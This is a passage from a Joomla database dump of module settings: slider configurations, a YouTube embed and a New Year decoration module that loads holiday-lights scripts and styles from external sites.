e\\\":{\\\"gk_musicstate_image_width\\\":\\\"640\\\",\\\"gk_musicstate_image_height\\\":\\\"320\\\",\\\"gk_musicstate_image_bg\\\":\\\"#000000\\\",\\\"gk_musicstate_quality\\\":\\\"95\\\",\\\"gk_musicstate_show_title_block\\\":\\\"1\\\",\\\"gk_musicstate_title_block_color\\\":\\\"#fff\\\",\\\"gk_musicstate_slide_links\\\":\\\"1\\\",\\\"gk_musicstate_animation_speed\\\":\\\"500\\\",\\\"gk_musicstate_animation_interval\\\":\\\"5000\\\",\\\"gk_musicstate_autoanimation\\\":\\\"1\\\"},\\\"gk_photo\\\":{\\\"gk_photo_module_height_desktop\\\":\\\"700\\\",\\\"gk_photo_module_height_tablet\\\":\\\"500\\\",\\\"gk_photo_module_height_mobile\\\":\\\"300\\\",\\\"gk_photo_image_width\\\":\\\"640\\\",\\\"gk_photo_image_height\\\":\\\"320\\\",\\\"gk_photo_image_bg\\\":\\\"#000000\\\",\\\"gk_photo_quality\\\":\\\"95\\\",\\\"gk_photo_dark_theme\\\":\\\"0\\\",\\\"gk_photo_show_title_block\\\":\\\"1\\\",\\\"gk_photo_show_pagination\\\":\\\"1\\\",\\\"gk_photo_animation_speed\\\":\\\"500\\\",\\\"gk_photo_animation_interval\\\":\\\"5000\\\",\\\"gk_photo_autoanimation\\\":\\\"1\\\"},\\\"gk_publisher\\\":{\\\"gk_publisher_image_width\\\":\\\"640\\\",\\\"gk_publisher_image_height\\\":\\\"320\\\",\\\"gk_publisher_image_bg\\\":\\\"#000000\\\",\\\"gk_publisher_quality\\\":\\\"95\\\",\\\"gk_publisher_title_block_position\\\":\\\"bottom\\\",\\\"gk_publisher_show_content_block\\\":\\\"1\\\",\\\"gk_publisher_show_title_block\\\":\\\"1\\\",\\\"gk_publisher_show_text_block\\\":\\\"1\\\",\\\"gk_publisher_title_block_length\\\":\\\"30\\\",\\\"gk_publisher_text_block_length\\\":\\\"80\\\",\\\"gk_publisher_pagination\\\":\\\"1\\\",\\\"gk_publisher_pagination_position\\\":\\\"bottom\\\",\\\"gk_publisher_slide_links\\\":\\\"1\\\",\\\"gk_publisher_animation_speed\\\":\\\"500\\\",\\\"gk_publisher_animation_interval\\\":\\\"5000\\\",\\\"gk_publisher_autoanimation\\\":\\\"1\\\"},\\\"gk_quark\\\":{\\\"gk_quark_module_height_desktop\\\":\\\"700\\\",\\\"gk_quark_module_height_tablet\\\":\\\"500\\\",\\\"gk_quark_module_height_mobile\\\":\\\"300\\\",\\\"gk_quark_show_pagination\\\":\\\"1\\\",\\\"gk_quark_show_slider\\\":\\\"1\\\",\\\"gk_quark_show_preview\\\":\\\"0\\\",\\\"gk_quark_image_width\\\":\\\"640\\\",\\\"gk_quark_image_height\\\":\\\"320\\\",\\\"gk_quark_image_bg\\\":\\\"#000000\\\",\\\"gk_quark_quality\\\":\\\"95\\\",\\\"gk_quark_animation_interval\\\":\\\"5000\\\",\\\"gk_quark_autoanimation\\\":\\\"1\\\"},\\\"gk_rockwall\\\":{\\\"gk_rockwall_image_width\\\":\\\"640\\\",\\\"gk_rockwall_image_height\\\":\\\"320\\\",\\\"gk_rockwall_image_bg\\\":\\\"#000000\\\",\\\"gk_rockwall_quality\\\":\\\"95\\\",\\\"gk_rockwall_show_title_block\\\":\\\"1\\\",\\\"gk_rockwall_title_block_bg\\\":\\\"transparent\\\",\\\"gk_rockwall_title_block_color\\\":\\\"#fff\\\",\\\"gk_rockwall_title_block_position\\\":\\\"left\\\",\\\"gk_rockwall_title_block_padding\\\":\\\"\\\",\\\"gk_rockwall_title_block_width\\\":\\\"\\\",\\\"gk_rockwall_slide_links\\\":\\\"1\\\",\\\"gk_rockwall_animation_speed\\\":\\\"500\\\",\\\"gk_rockwall_animation_interval\\\":\\\"5000\\\",\\\"gk_rockwall_autoanimation\\\":\\\"1\\\"},\\\"gk_shop_and_buy\\\":{\\\"gk_shop_and_buy_image_width\\\":\\\"640\\\",\\\"gk_shop_and_buy_image_height\\\":\\\"320\\\",\\\"gk_shop_and_buy_image_bg\\\":\\\"#000000\\\",\\\"gk_shop_and_buy_quality\\\":\\\"95\\\",\\\"gk_shop_and_buy_show_content_block\\\":\\\"1\\\",\\\"gk_shop_and_buy_show_title_block\\\":\\\"1\\\",\\\"gk_shop_and_buy_show_text_block\\\":\\\"1\\\",\\\"gk_shop_and_buy_title_block_length\\\":\\\"30\\\",\\\"gk_shop_and_buy_text_block_length\\\":\\\"80\\\",\\\"gk_shop_and_buy_pagination\\\":\\\"1\\\",\\\"gk_shop_and_buy_pagination_arrows\\\":\\\"1\\\",\\\"gk_shop_and_buy_slide_links\\\":\\\"1\\\",\\\"gk_shop_and_buy_animation_speed\\\":\\\"1000\\\",\\\"gk_shop_and_buy_animation_interval\\\":\\\"6000\\\",\\\"gk_shop_and_buy_autoanimation\\\":\\\"1\\\"},\\\"gk_startup\\\":{\\\"gk_startup_image_bg\\\":\\\"transparent\\\",\\\"gk_startup_quality\\\":\\\"95\\\",\\\"gk_startup_desktop_width\\\":\\\"1000\\\",\\\"gk_startup_image_width\\\":\\\"804\\\",\\\"gk_startup_module_height\\\":\\\"920\\\",\\\"gk_startup_tablet_width\\\":\\\"920\\\",\\\"gk_startup_tablet_image_width\\\":\\\"603\\\",\\\"gk_startup_tablet_module_height\\\":\\\"690\\\",\\\"gk_startup_mobile_width\\\":\\\"580\\\",\\\"gk_startup_mobile_image_width\\\":\\\"338\\\",\\\"gk_startup_mobile_module_height\\\":\\\"386\\\",\\\"gk_startup_pagination\\\":\\\"1\\\",\\\"gk_startup_arrows\\\":\\\"1\\\",\\\"gk_startup_slide_links\\\":\\\"1\\\",\\\"gk_startup_animation_speed\\\":\\\"500\\\",\\\"gk_startup_animation_interval\\\":\\\"5000\\\",\\\"gk_startup_autoanimation\\\":\\\"1\\\"},\\\"gk_storebox\\\":{\\\"gk_storebox_image_width\\\":\\\"640\\\",\\\"gk_storebox_image_height\\\":\\\"320\\\",\\\"gk_storebox_image_bg\\\":\\\"#000000\\\",\\\"gk_storebox_quality\\\":\\\"95\\\",\\\"gk_storebox_show_title_block\\\":\\\"1\\\",\\\"gk_storebox_title_block_bg\\\":\\\"transparent\\\",\\\"gk_storebox_title_block_color\\\":\\\"#fff\\\",\\\"gk_storebox_title_block_position_y\\\":\\\"30\\\",\\\"gk_storebox_title_block_position_x\\\":\\\"30\\\",\\\"gk_storebox_pagination\\\":\\\"1\\\",\\\"gk_storebox_slide_links\\\":\\\"1\\\",\\\"gk_storebox_animation_speed\\\":\\\"500\\\",\\\"gk_storebox_animation_interval\\\":\\\"5000\\\",\\\"gk_storebox_autoanimation\\\":\\\"1\\\"},\\\"gk_storefront\\\":{\\\"gk_storefront_module_height_desktop\\\":\\\"700\\\",\\\"gk_storefront_module_height_tablet\\\":\\\"500\\\",\\\"gk_storefront_module_height_mobile\\\":\\\"300\\\",\\\"gk_storefront_image_width\\\":\\\"640\\\",\\\"gk_storefront_image_height\\\":\\\"320\\\",\\\"gk_storefront_image_bg\\\":\\\"#000000\\\",\\\"gk_storefront_quality\\\":\\\"95\\\",\\\"gk_storefront_show_title_block\\\":\\\"1\\\",\\\"gk_storefront_show_pagination\\\":\\\"1\\\",\\\"gk_storefront_slide_links\\\":\\\"1\\\",\\\"gk_storefront_animation_speed\\\":\\\"500\\\",\\\"gk_storefront_animation_interval\\\":\\\"5000\\\",\\\"gk_storefront_autoanimation\\\":\\\"1\\\"},\\\"gk_university\\\":{\\\"gk_university_image_width\\\":\\\"1720\\\",\\\"gk_university_image_height\\\":\\\"896\\\",\\\"gk_university_tablet_image_width\\\":\\\"1040\\\",\\\"gk_university_tablet_image_height\\\":\\\"542\\\",\\\"gk_university_mobile_image_width\\\":\\\"640\\\",\\\"gk_university_mobile_image_height\\\":\\\"334\\\",\\\"gk_university_image_bg\\\":\\\"#000000\\\",\\\"gk_university_quality\\\":\\\"95\\\",\\\"gk_university_show_title_block\\\":\\\"1\\\",\\\"gk_university_animation_loop\\\":\\\"1\\\",\\\"gk_university_slide_links\\\":\\\"1\\\",\\\"gk_university_animation_speed\\\":\\\"500\\\",\\\"gk_university_animation_interval\\\":\\\"5000\\\"}}\",\"memory_limit\":\"128M\",\"generate_thumbnails\":\"1\",\"random_slides\":\"0\",\"use_style_css\":\"1\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(163,2510,'новорічна мотня','','',1,'header',0,'0000-00-00 00:00:00','2022-12-24 12:25:00','2023-01-19 02:09:00',-2,'mod_anycode',1,1,'{\"anycode\":\"<script type=\\\"text\\/javascript\\\" src=\\\"http:\\/\\/s3.ucoz.net\\/src\\/jquery-1.7.2.js\\\"><\\/script><div style=\\\"position:absolute;top:0px;left:0px;width:300px;height:229px;background:url(\'http:\\/\\/uguide.ru\\/js\\/script\\/vetka.png\')\\\"><\\/div>\\r\\n<link rel=\\\"stylesheet\\\" href=\\\"http:\\/\\/uguide.ru\\/js\\/script\\/ds-lights-muzik.css\\\">\\r\\n<script type=\\\"text\\/javascript\\\" src=\\\"http:\\/\\/uguide.ru\\/js\\/script\\/ds-lights-muzik.js\\\"><\\/script>\\r\\n<script type=\\\"text\\/javascript\\\" src=\\\"http:\\/\\/uguide.ru\\/js\\/script\\/ds-lights-muzik1.js\\\"><\\/script><div class=\\\"b-page_newyear\\\">\\r\\n<div class=\\\"b-page__content\\\">\\r\\n<i class=\\\"b-head-decor\\\">\\r\\n<i class=\\\"b-head-decor__inner b-head-decor__inner_n1\\\">\\r\\n<div class=\\\"b-ball b-ball_n1 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n2 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n3 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n4 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n5 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n6 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n7 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n8 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n9 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i1\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i2\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i3\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i4\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i5\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i6\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<\\/i>\\r\\n<i class=\\\"b-head-decor__inner b-head-decor__inner_n2\\\">\\r\\n<div class=\\\"b-ball b-ball_n1 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n2 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n3 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n4 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n5 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n6 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n7 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n8 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n9 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i1\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i2\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i3\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i4\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i5\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i6\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<\\/i>\\r\\n<i class=\\\"b-head-decor__inner b-head-decor__inner_n3\\\">\\r\\n<div class=\\\"b-ball b-ball_n1 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n2 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n3 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n4 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n5 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n6 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n7 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n8 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n9 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i1\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i2\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i3\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i4\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i5\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i6\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<\\/i>\\r\\n<i class=\\\"b-head-decor__inner b-head-decor__inner_n4\\\">\\r\\n<div class=\\\"b-ball b-ball_n1 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n2 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n3 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n4 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n5 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n6 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n7 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n8 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n9 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i1\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i2\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i3\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i4\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i5\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i6\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<\\/i>\\r\\n<i class=\\\"b-head-decor__inner b-head-decor__inner_n5\\\">\\r\\n<div class=\\\"b-ball b-ball_n1 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n2 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n3 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n4 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n5 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n6 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n7 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n8 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_n9 b-ball_bounce\\\">\\r\\n<div class=\\\"b-ball__right\\\"><\\/div><div class=\\\"b-ball__i\\\"><\\/div><\\/div>\\r\\n<div class=\\\"b-ball b-ball_i1\\\">\\r\\n<div class=\\\"b-ball__right\",\"urlsniffer\":\"\",\"browsersniffer\":\"all\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(167,2516,'Ялинка','','									<p><img alt=\"\" class=\"fr-dii fr-fin\" height=\"173\" src=\"https://uguide.ru/js/script/elka_ot_uguide_ru_2.gif\" width=\"118\"></p>',1,'right',0,'0000-00-00 00:00:00','2021-12-20 12:43:03','0000-00-00 00:00:00',-2,'mod_custom',1,0,'{\"prepare_content\":0,\"backgroundimage\":\"images\\/stories\\/2012_2.jpg\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":1,\"cache_time\":900,\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(169,2525,'BT Content Slider_слайдер','','',1,'banner6',0,'0000-00-00 00:00:00','2020-08-30 17:10:54','0000-00-00 00:00:00',1,'mod_bt_contentslider',1,0,'{\"moduleclass_sfx\":\"\",\"layout\":\"_:default\",\"content_title\":\"\",\"content_link\":\"\",\"butlet\":\"1\",\"navigation_top\":\"0\",\"navigation_right\":\"0\",\"next_back\":\"0\",\"module_width\":\"auto\",\"module_height\":\"auto\",\"auto_height\":\"1\",\"items_per_cols\":\"1\",\"items_per_rows\":\"3\",\"source\":\"category\",\"article_ids\":\"\",\"k2_article_ids\":\"\",\"btportfolio_article_ids\":\"\",\"easyblog_article_ids\":\"\",\"auto_category\":\"0\",\"sub_categories\":\"0\",\"exclude_categories\":\"\",\"limit_items\":\"12\",\"limit_items_for_each\":\"0\",\"user_id\":\"0\",\"show_featured\":\"2\",\"ordering\":\"created-desc\",\"content_plugin\":\"0\",\"use_introimg\":\"1\",\"use_caption\":\"0\",\"use_linka\":\"0\",\"show_title\":\"1\",\"limit_title_by\":\"word\",\"title_max_chars\":\"8\",\"show_intro\":\"1\",\"limit_description_by\":\"char\",\"description_max_chars\":\"100\",\"show_category_name\":\"1\",\"show_category_name_as_link\":\"1\",\"show_readmore\":\"1\",\"show_date\":\"0\",\"show_author\":\"0\",\"show_image\":\"1\",\"checkimg_fulltext\":\"0\",\"check_image_exist\":\"0\",\"image_align\":\"center\",\"equalHeight\":\"1\",\"image_thumb\":\"1\",\"thumbnail_width\":\"180\",\"thumbnail_height\":\"120\",\"image_quality\":\"80\",\"default_thumb\":\"1\",\"touch_screen\":\"0\",\"hovereffect\":\"1\",\"modalbox\":\"0\",\"next_back_effect\":\"slide\",\"bullet_effect\":\"slide\",\"pause_hover\":\"1\",\"interval\":\"5000\",\"duration\":\"500\",\"effect\":\"easeOutQuad\",\"auto_start\":\"1\",\"auto_strip_tags\":\"1\",\"open_target\":\"_parent\",\"loadJquery\":\"auto\",\"cache\":\"1\",\"cache_time\":\"900\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(170,2839,'SP Portfolio','','',1,'breadcrumb',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_sp_portfolio',1,0,'{\"catid\":\"8\",\"limit\":\"1\",\"column\":\"1\",\"ajaxlimit\":\"2\",\"orderby\":\"a.created\",\"ordering\":\"DESC\",\"show_featured\":\"\",\"module_layout\":\"default\",\"show_title\":\"1\",\"linked_title\":\"1\",\"show_category\":\"1\",\"show_url\":\"1\",\"show_introtext\":\"1\",\"show_readmore\":\"1\",\"ajax_loader\":\"1\",\"show_filter\":\"1\",\"load_jquery\":\"1\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(171,2840,'SP Simple Youtube','','',1,'banner4',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_sp_simple_youtube',1,0,'{\"moduleclass_sfx\":\"https:\\/\\/www.youtube.com\\/watch?v=STWAgV0XK-Y\",\"youtube_id\":\"STWAgV0XK-Y\",\"width\":\"640\",\"height\":\"480\",\"responsive\":\"1\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(172,2841,'Vina Animations Image Slider','','',1,'banner1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_vina_animations_image_slider',1,1,'{\"moduleWidth\":\"\",\"moduleHeight\":\"\",\"resizeImage\":\"1\",\"resizeType\":\"1\",\"imageWidth\":\"940\",\"imageHeight\":\"420\",\"captionBlock\":\"1\",\"captionStyle\":\"\",\"animationIn\":\"fadeIn\",\"animationOut\":\"fadeOut\",\"stopOnHover\":\"1\",\"loop\":\"1\",\"delay\":\"5000\",\"slides\":\"{\\\"src\\\":\\\"list\\\",\\\"list\\\":[{\\\"name\\\":\\\"Slide item 1\\\",\\\"img\\\":\\\"modules\\/mod_vina_animations_image_slider\\/samples\\/image-1.jpg\\\",\\\"text\\\":\\\"<div class=\\\\\\\"caption-block\\\\\\\">\\\\n\\\\t<h3>H3 Tag - This is caption of the image!<\\/h3>\\\\n\\\\t<p>P Tag - This is description of the image. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae.<\\/p>\\\\n<\\/div>\\\"},{\\\"name\\\":\\\"Slide item 2\\\",\\\"img\\\":\\\"modules\\/mod_vina_animations_image_slider\\/samples\\/image-2.jpg\\\",\\\"text\\\":\\\"<div class=\\\\\\\"caption-block\\\\\\\">\\\\n\\\\t<h3>H3 Tag - This is caption of the image!<\\/h3>\\\\n\\\\t<p>P Tag - This is description of the image. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae.<\\/p>\\\\n<\\/div>\\\"},{\\\"name\\\":\\\"Slide item 3\\\",\\\"img\\\":\\\"modules\\/mod_vina_animations_image_slider\\/samples\\/image-3.jpg\\\",\\\"text\\\":\\\"<div class=\\\\\\\"caption-block\\\\\\\">\\\\n\\\\t<h3>H3 Tag - This is caption of the image!<\\/h3>\\\\n\\\\t<p>P Tag - This is description of the image. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae.<\\/p>\\\\n<\\/div>\\\"},{\\\"name\\\":\\\"Slide item 4\\\",\\\"img\\\":\\\"modules\\/mod_vina_animations_image_slider\\/samples\\/image-4.jpg\\\",\\\"text\\\":\\\"<div class=\\\\\\\"caption-block\\\\\\\">\\\\n\\\\t<h3>H3 Tag - This is caption of the 